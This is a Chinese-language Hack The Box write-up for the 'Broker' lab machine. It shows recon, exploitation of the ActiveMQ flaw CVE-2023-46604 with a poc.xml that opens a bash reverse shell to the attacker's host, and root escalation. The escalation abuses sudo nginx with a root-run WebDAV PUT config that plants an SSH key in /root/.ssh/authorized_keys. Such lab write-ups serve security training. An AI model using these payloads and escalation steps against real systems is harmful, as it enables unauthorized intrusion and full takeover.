Broker-htb-writeup

0x00 靶场技能介绍

章节技能：目录遍历、CVE-2023-46604、nginx加载自定义配置、put上传个人公钥

参考链接：https://0xdf.gitlab.io/2023/11/09/htb-broker.html
参考链接：https://heapbytes.gitbook.io/notes/rooms/hackthebox/easy/broker
参考链接：https://fismathack.github.io/hackthebox/broker/index.html
参考链接：https://stackoverflow.com/questions/16912270/how-do-i-allow-a-put-file-request-on-nginx-server

0x01 用户权限获取

1、首先我们启动靶机，获取到靶机IP地址：Target IP Address ： 10.10.11.243

2、开启我们的openvpn进行连接到靶机的内网环境下。

┌──(kali㉿kali)-[~/桌面/HTB-VPN]
└─$ sudo openvpn lab_shiyan.ovpn
[sudo] kali 的密码：
2023-11-29 10:52:17 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.

3、尝试能否ping通主机

┌──(kali㉿kali)-[~/桌面]
└─$ ping 10.10.11.243 -c 4
PING 10.10.11.243 (10.10.11.243) 56(84) bytes of data.
64 bytes from 10.10.11.243: icmp_seq=1 ttl=63 time=271 ms
64 bytes from 10.10.11.243: icmp_seq=2 ttl=63 time=269 ms
64 bytes from 10.10.11.243: icmp_seq=3 ttl=63 time=385 ms
64 bytes from 10.10.11.243: icmp_seq=4 ttl=63 time=307 ms

--- 10.10.11.243 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3006ms
rtt min/avg/max/mdev = 269.155/308.148/385.357/47.087 ms

4、使用nmap 对靶机进行端口扫描，查看开放了哪些端口服务

┌──(kali㉿kali)-[~/桌面]
└─$ nmap -sV -sC -oN braker-allports  10.10.11.243
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-29 10:56 CST
Nmap scan report for 10.10.11.243
Host is up (0.27s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Index of /
| http-ls: Volume /
|   maxfiles limit reached (10)
| SIZE    TIME               FILENAME
| -       06-Nov-2023 01:10  bin/
| -       06-Nov-2023 01:10  bin/X11/
| 963     17-Feb-2020 14:11  bin/NF
| 129576  27-Oct-2023 11:38  bin/VGAuthService
| 51632   07-Feb-2022 16:03  bin/%5B
| 35344   19-Oct-2022 14:52  bin/aa-enabled
| 35344   19-Oct-2022 14:52  bin/aa-exec
| 31248   19-Oct-2022 14:52  bin/aa-features-abi
| 14478   04-May-2023 11:14  bin/add-apt-repository
| 14712   21-Feb-2022 01:49  bin/addpart
|_
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.64 seconds

5、通过nmap扫描，我们发现了网站开放了2个WEB服务，其中80端口是一个认证的应用，登录就显示让输入账号密码。

6、然后8080端口是存在一个目录遍历漏洞的页面。

5d71ad8152728184760e32a11c3c71b0

8、整体上感觉漏了些什么，从新进行全端口扫描

┌──(kali㉿kali)-[~/桌面]
└─$ nmap -sCV -p-  10.10.11.243 -min-rate=500 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-29 11:31 CST
Nmap scan report for 10.10.11.243
Host is up (0.27s latency).
Not shown: 65524 closed tcp ports (conn-refused)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp    open  http       nginx 1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
1337/tcp  open  http       nginx 1.18.0 (Ubuntu)
| http-ls: Volume /
|   maxfiles limit reached (10)
| SIZE    TIME               FILENAME
| -       06-Nov-2023 01:10  bin/
| -       06-Nov-2023 01:10  bin/X11/
| 963     17-Feb-2020 14:11  bin/NF
| 129576  27-Oct-2023 11:38  bin/VGAuthService
| 51632   07-Feb-2022 16:03  bin/%5B
| 35344   19-Oct-2022 14:52  bin/aa-enabled
| 35344   19-Oct-2022 14:52  bin/aa-exec
| 31248   19-Oct-2022 14:52  bin/aa-features-abi
| 14478   04-May-2023 11:14  bin/add-apt-repository
| 14712   21-Feb-2022 01:49  bin/addpart
|_
|_http-title: Index of /
|_http-server-header: nginx/1.18.0 (Ubuntu)
1883/tcp  open  mqtt
|_mqtt-subscribe: Failed to receive control packet from server.
5672/tcp  open  amqp?
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     AMQP
|     AMQP
|     amqp:decode-error
|_    7Connection from client using unsupported AMQP attempted
8080/tcp  open  http       nginx 1.18.0 (Ubuntu)
| http-ls: Volume /
|   maxfiles limit reached (10)
| SIZE    TIME               FILENAME
| -       06-Nov-2023 01:10  bin/
| -       06-Nov-2023 01:10  bin/X11/
| 963     17-Feb-2020 14:11  bin/NF
| 129576  27-Oct-2023 11:38  bin/VGAuthService
| 51632   07-Feb-2022 16:03  bin/%5B
| 35344   19-Oct-2022 14:52  bin/aa-enabled
| 35344   19-Oct-2022 14:52  bin/aa-exec
| 31248   19-Oct-2022 14:52  bin/aa-features-abi
| 14478   04-May-2023 11:14  bin/add-apt-repository
| 14712   21-Feb-2022 01:49  bin/addpart
|_
|_http-title: Index of /
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.18.0 (Ubuntu)
8161/tcp  open  http       Jetty 9.4.39.v20210325
|_http-title: Error 401 Unauthorized
|_http-server-header: Jetty(9.4.39.v20210325)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
44981/tcp open  tcpwrapped
61613/tcp open  stomp      Apache ActiveMQ
| fingerprint-strings: 
|   HELP4STOMP: 
|     ERROR
|     content-type:text/plain
|     message:Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
|     org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
|     org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
|     org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
|     org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_    java.lang.Thread.run(Thread.java:750)
61614/tcp open  http       Jetty 9.4.39.v20210325
|_http-server-header: Jetty(9.4.39.v20210325)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title.
61616/tcp open  apachemq   ActiveMQ OpenWire transport
| fingerprint-strings: 
|   NULL: 
|     ActiveMQ
|     TcpNoDelayEnabled
|     SizePrefixDisabled
|     CacheSize
|     ProviderName 
|     ActiveMQ
|     StackTraceEnabled
|     PlatformDetails 
|     Java
|     CacheEnabled
|     TightEncodingEnabled
|     MaxFrameSize
|     MaxInactivityDuration
|     MaxInactivityDurationInitalDelay
|     ProviderVersion 
|_    5.15.15
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :

9、我们发现网站是开放着 ActiveMQ 服务，且版本号是 5.15.15 ，可以根据这个信息搜集下是否存在漏洞。

10、通过使用kali自带的 searchsploit 进行扫描查看

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit ActiveMQ        

------------------------------------------- ---------------------------------

 Exploit Title                             |  Path

------------------------------------------- ---------------------------------

ActiveMQ < 5.14.0 - Web Shell Upload (Meta | java/remote/42283.rb
Apache ActiveMQ 5.11.1/5.13.2 - Directory  | windows/remote/40857.txt
Apache ActiveMQ 5.2/5.3 - Source Code Info | multiple/remote/33868.txt
Apache ActiveMQ 5.3 - 'admin/queueBrowse'  | multiple/remote/33905.txt
Apache ActiveMQ 5.x-5.11.1 - Directory Tra | windows/remote/48181.rb

------------------------------------------- ---------------------------------

Shellcodes: No Results

11、看来是有些东西的，不过我们再通过谷歌搜索下，看看有最新的直接RCE的漏洞没有吧

12、看来是有些东西的，具体细看下吧，参考链接：https://www.prio-n.com/blog/cve-2023-46604-attacking-defending-ActiveMQ

13、在找CVE-2023-46604的同时，我们在网站的目录遍历里发现了网站认证的登录密码，并尝试了登录。
http://10.10.11.243:8080/opt/apache-activemq-5.15.15/conf/users.properties

14、但是并没有看到什么有用的价值的东西，不过我们找到了exp，在github上。

https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell

16、下载下来，在本地进行尝试。

┌──(kali㉿kali)-[~/桌面/CVE-2023-46604-ActiveMQ-RCE-pseudoshell-master]
└─$ python3 exploit.py -i 10.10.11.243 -p 61616  -si 10.10.14.86 -sp 8080
#################################################################################

#  CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell      #

#  Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d              #

#################################################################################

[*] Target: 10.10.11.243:61616
[*] Serving XML at: http://10.10.14.86:8080/poc.xml
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.
[*] Type 'exit' to quit

#################################################################################

# Not yet connected, send a command to test connection to host.                 #

# Prompt will change to Apache ActiveMQ$ once at least one response is received #

# Please note this is a one-off connection check, re-run the script if you      #

# want to re-check the connection.                                              #

#################################################################################

[Target not responding!]$ ls
Traceback (most recent call last):
  File "/home/kali/桌面/CVE-2023-46604-ActiveMQ-RCE-pseudoshell-master/exploit.py", line 172, in <module>
    main(args.ip, args.port, args.srvip, args.srvport)
  File "/home/kali/桌面/CVE-2023-46604-ActiveMQ-RCE-pseudoshell-master/exploit.py", line 48, in main
    execute(ip, port, srvip, srvport, command, url)
  File "/home/kali/桌面/CVE-2023-46604-ActiveMQ-RCE-pseudoshell-master/exploit.py", line 59, in execute
    conn.connect((ip, port))
OSError: [Errno 113] No route to host

17、整体用下来不太好用，换一个试试。
https://github.com/evkl1d/CVE-2023-46604

18、这个也是不太好用，没有什么动静，继续换下一个

https://github.com/X1r0z/ActiveMQ-RCE

19、修改上述工具里 poc.xml 内容

<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg >
            <list>
                <value>bash</value>
                <value>-c</value>
                <value>bash -i &gt;&amp; /dev/tcp/10.10.14.86/10086 0&gt;&amp;1</value>
            </list>
            </constructor-arg>
        </bean>
    </beans>

20、开启一个WEB服务，方便上述远程访问我们的这个poc文件

┌──(kali㉿kali)-[~/桌面/ActiveMQ-RCE-main]
└─$ python3 -m http.server 8000                                          
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.243 - - [29/Nov/2023 15:19:36] "GET /poc.xml HTTP/1.1" 200 -
10.10.11.243 - - [29/Nov/2023 15:19:36] "GET /poc.xml HTTP/1.1" 200 -
10.10.11.243 - - [29/Nov/2023 15:21:20] "GET /poc.xml HTTP/1.1" 200 -
10.10.11.243 - - [29/Nov/2023 15:21:21] "GET /poc.xml HTTP/1.1" 200 -

21、设置一个接收反弹shell的nc监听

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...

22、开启exp攻击

┌──(kali㉿kali)-[~/桌面/ActiveMQ-RCE-main]
└─$ go run main.go -i 10.10.11.243 -u http://10.10.14.86:8000/poc.xml
     _        _   _           __  __  ___        ____   ____ _____ 
    / \   ___| |_(_)_   _____|  \/  |/ _ \      |  _ \ / ___| ____|
   / _ \ / __| __| \ \ / / _ \ |\/| | | | |_____| |_) | |   |  _|  
  / ___ \ (__| |_| |\ V /  __/ |  | | |_| |_____|  _ <| |___| |___ 
 /_/   \_\___|\__|_| \_/ \___|_|  |_|\__\_\     |_| \_\\____|_____|

[*] Target: 10.10.11.243:61616
[*] XML URL: http://10.10.14.86:8000/poc.xml

[*] Sending packet: 000000721f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401001f687474703a2f2f31302e31302e31342e38363a383030302f706f632e786d6c

23、成功获取到当前的user的shell

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.86] from (UNKNOWN) [10.10.11.243] 34844
bash: cannot set terminal process group (906): Inappropriate ioctl for device
bash: no job control in this shell
activemq@broker:/opt/apache-activemq-5.15.15/bin$ 

activemq@broker:/opt/apache-activemq-5.15.15/bin$ id
id
uid=1000(activemq) gid=1000(activemq) groups=1000(activemq)

24、来获取下当前用户的user.txt文件吧

activemq@broker:/opt/apache-activemq-5.15.15/bin$ cd ~
cd ~
activemq@broker:~$ pwd
pwd
/home/activemq
activemq@broker:~$ ls
ls
user.txt
activemq@broker:~$ cat user.txt
cat user.txt
763274ed5f8c681b1afad93f6e0e3498
activemq@broker:~$ 

0x02 系统权限获取

25、开启一个Python的交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

activemq@broker:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
activemq@broker:~$ ls
ls
user.txt
activemq@broker:~$ 

26、我们常规的查看下是否存在sudo相关权限

activemq@broker:~$ sudo -l
sudo -l
Matching Defaults entries for activemq on broker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User activemq may run the following commands on broker:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx
activemq@broker:~$ 

27、 可以看出我们有 /usr/sbin/nginx 的root权限，然后根据htb的引导模式，应该是让我们创建一个具有root权限的网络服务。

activemq 用户可以像任何其他用户一样运行的二进制文件的完整路径是什么sudo？
/usr/sbin/nginx

哪个 nginx 指令可用于定义允许的 WebDAV 方法？
dav_methods

使用哪种 HTTP 方法通过 WebDAV 协议写入文件？
PUT

哪个标志用于nginx通过指定文件来设置自定义配置？
-c

28、根据搜索我们知道了创建一个配置文件的默认方法，我们首先先生成个空白的.conf文件

activemq@broker:~$ cd /tmp
cd /tmp
activemq@broker:/tmp$ ls
ls
activemq@broker:/tmp$ touch exp.conf
touch exp.conf
activemq@broker:/tmp$ ls
ls
poc.conf

29、然后把默认的配置文件已base64的形式转码解码放进去poc.conf文件里，因为我们不是使用的ssh登录的，如果直接vim的话，很容易产生一些错误。

user root;
events {
    worker_connections 1024;
}
http {
    server {
        listen 1337;
        root /;
        autoindex on;
    }
}

dXNlciByb290OwpldmVudHMgewogICAgd29ya2VyX2Nvbm5lY3Rpb25zIDEwMjQ7Cn0KaHR0cCB7CiAgICBzZXJ2ZXIgewogICAgICAgIGxpc3RlbiAxMzM3OwogICAgICAgIHJvb3QgLzsKICAgICAgICBhdXRvaW5kZXggb247CiAgICB9Cn0=

30、我们使用下列命令把文件放入到poc.conf文件里。

echo dXNlciByb290OwpldmVudHMgewogICAgd29ya2VyX2Nvbm5lY3Rpb25zIDEwMjQ7Cn0KaHR0cCB7CiAgICBzZXJ2ZXIgewogICAgICAgIGxpc3RlbiAxMzM3OwogICAgICAgIHJvb3QgLzsKICAgICAgICBhdXRvaW5kZXggb247CiAgICB9Cn0= | base64 -d > poc.conf

activemq@broker:/tmp$ echo dXNlciByb290OwpldmVudHMgewogICAgd29ya2VyX2Nvbm5lY3Rpb25zIDEwMjQ7Cn0KaHR0cCB7CiAgICBzZXJ2ZXIgewogICAgICAgIGxpc3RlbiAxMzM3OwogICAgICAgIHJvb3QgLzsKICAgICAgICBhdXRvaW5kZXggb247CiAgICB9Cn0= | base64 -d > poc.conf
<dXRvaW5kZXggb247CiAgICB9Cn0= | base64 -d > poc.conf
activemq@broker:/tmp$ cat poc.conf
cat poc.conf
user root;
events {
    worker_connections 1024;
}
http {
    server {
        listen 1337;
        root /;
        autoindex on;
    }
}

31、然后启动我们自定的配置文件，并读取root.txt文件。

activemq@broker:/tmp$ sudo /usr/sbin/nginx -c /tmp/poc.conf     
sudo /usr/sbin/nginx -c /tmp/poc.conf
activemq@broker:/tmp$ curl localhost:1337/root/root.txt
curl localhost:1337/root/root.txt
11eecdc53b331488c5104d18605059fd
activemq@broker:/tmp$ 

32、到这里其实还没有结束，我们需要拿到root的shell才可以，前期根据引导模式，dav_methods PUT 的关键词，可以推测进行上传我们的公钥，进行ssh登录。

33、重新生成 poc.conf 文件

user root;
events {
    worker_connections 1024;
}
http {
    server {
        listen 1338;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}

dXNlciByb290OwpldmVudHMgewogICAgd29ya2VyX2Nvbm5lY3Rpb25zIDEwMjQ7Cn0KaHR0cCB7CiAgICBzZXJ2ZXIgewogICAgICAgIGxpc3RlbiAxMzM4OwogICAgICAgIHJvb3QgLzsKICAgICAgICBhdXRvaW5kZXggb247CiAgICAgICAgZGF2X21ldGhvZHMgUFVUOwogICAgfQp9

echo dXNlciByb290OwpldmVudHMgewogICAgd29ya2VyX2Nvbm5lY3Rpb25zIDEwMjQ7Cn0KaHR0cCB7CiAgICBzZXJ2ZXIgewogICAgICAgIGxpc3RlbiAxMzM4OwogICAgICAgIHJvb3QgLzsKICAgICAgICBhdXRvaW5kZXggb247CiAgICAgICAgZGF2X21ldGhvZHMgUFVUOwogICAgfQp9 | base64 -d > poc.conf

34、加载我们重新生成的服务，这里相较于上一个，我们变更了个端口，避免端口冲突无法加载。

sudo /usr/sbin/nginx -c /tmp/poc.conf

35、在我们的kali机器里生成下公私钥。

┌──(kali㉿kali)-[~/.ssh]
└─$ ssh-keygen -t rsa -b 2048
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:Q0 kali@kali
The key's randomart image is:
+---[RSA 2048]----+
|+**...oXO*.      |
|+=+= .++E.+      |
|o.oo.  ooo .     |
| ....+ .o . .    |
|  . =o  S. o     |
|   ..o.  ..      |
|   .o .          |
|. .. .           |
|++.              |
+----[SHA256]-----+


┌──(kali㉿kali)-[~/.ssh]
└─$ ls    
id_rsa  id_rsa.pub  known_hosts  known_hosts.old

36、我们再查看下远程服务上是否存在这个公钥文件 authorized_keys

activemq@broker:/tmp$ curl localhost:1338/root/.ssh/
curl localhost:1338/root/.ssh/
<html>

<head><title>Index of /root/.ssh/</title></head>

<body>

<h1>Index of /root/.ssh/</h1><hr><pre><a href="../">../</a>

<a href="authorized_keys">authorized_keys</a>                                    27-Apr-2023 16:07                   0
</pre><hr></body>
</html>

37、我们使用put权限进行把我们本地的公钥进行上次服务器。

┌──(kali㉿kali)-[~/.ssh]
└─$ curl -X PUT http://10.10.11.243:1338/root/.ssh/authorized_keys \
 --upload-file ~/.ssh/id_rsa.pub

38、我们再次查看下是否成功上传了

activemq@broker:/tmp$ curl localhost:1338/root/.ssh/
curl localhost:1338/root/.ssh/
<html>

<head><title>Index of /root/.ssh/</title></head>

<body>

<h1>Index of /root/.ssh/</h1><hr><pre><a href="../">../</a>

<a href="authorized_keys">authorized_keys</a>                                    29-Nov-2023 08:28                 391
</pre><hr></body>
</html>
activemq@broker:/tmp$

39、可以看到，时间更新了，我们是成功上传了，那就接下来就是ssh登录了。

┌──(kali㉿kali)-[~]
└─$ ssh root@10.10.11.243 
The authenticity of host '10.10.11.243 (10.10.11.243)' can't be established.
ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.243' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Nov 29 08:29:24 AM UTC 2023

  System load:           0.16015625
  Usage of /:            70.4% of 4.63GB
  Memory usage:          12%
  Swap usage:            0%
  Processes:             162
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.243
  IPv6 address for eth0: dead:beef::250:56ff:feb9:c464


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

root@broker:~# 
root@broker:~# pwd
/root
root@broker:~# ls
cleanup.sh  root.txt
root@broker:~# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/578